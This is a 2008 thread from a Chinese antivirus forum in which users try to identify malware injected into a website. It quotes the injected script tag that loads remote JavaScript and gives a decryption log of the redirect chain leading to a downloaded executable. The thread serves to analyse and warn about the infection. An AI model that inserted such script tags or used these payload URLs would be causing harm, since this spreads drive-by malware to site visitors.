瑞星卡卡安全论坛

首页 » 技术交流区 » 可疑文件交流 » 这个网站上的是什么毒?
望_岳 - 2008-12-27 11:44:00
如题!  网址是:http://www.bdkjcb.com    我看网站代码里有这么一句!  我知道这就是病毒! 但是大多杀毒软件杀不出来! 不知道是什么毒!  请高手看看!

<script language="javascript" src="http://office2.viens.la/office.js?do=list&uid=193&type=blog"></script>  里面有这么一句!  高手看完记得回话啊!

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TheWorld)
望_岳 - 2008-12-27 15:58:00
怎么没人回就沉了!  :default11:
望_岳 - 2008-12-27 16:26:00
这个病毒是做什么的?  打开这个网站之后! 只提示是恶意代码!  不知道这个毒有什么危害啊!
零三 - 2008-12-27 17:44:00
http://www.bdkjcb.com 
该网站被插入


http://www.yulllll.cn/hooot/58/web/newcmd.htm
解密日志

Level 0>http://www.yulllll.cn/hooot/58/web/newcmd.htm
Level 1>http://www.yulllll.cn/hooot/58/web/14.htm
Level 1>http://www.yulllll.cn/hooot/58/web/tv.htm
Level 2>http://www.tjthhhh.cn/1.exe  ●
Level 1>http://www.yulllll.cn/hooot/58/web/as.htm
Level 2>
Level 3>http://www.tjthhhh.cn/1.exe  ●
Level 1>http://www.yulllll.cn/hooot/58/web/xlpp.htm
Level 2>http://www.tjthhhh.cn/1.exe  ●
Level 1>http://www.yulllll.cn/hooot/58/web/lz.htm
Level 2>http://www.yulllll.cn/hooot/58/web/olze.htm
Level 3>http://www.tjthhhh.cn/1.exe  ●

被挂马:default3: :default3:
流浪的熊 - 2008-12-28 20:34:00
如何解除呢?俺也想知道这个东东怎么破……
hoz2004 - 2008-12-28 22:48:00
找漏洞,恢复数据:default6:
流浪的熊 - 2008-12-29 20:57:00
俺是菜鸟,咋做啊……
1
查看完整版本: 这个网站上的是什么毒?
© 2000 - 2025 Rising Corp. Ltd.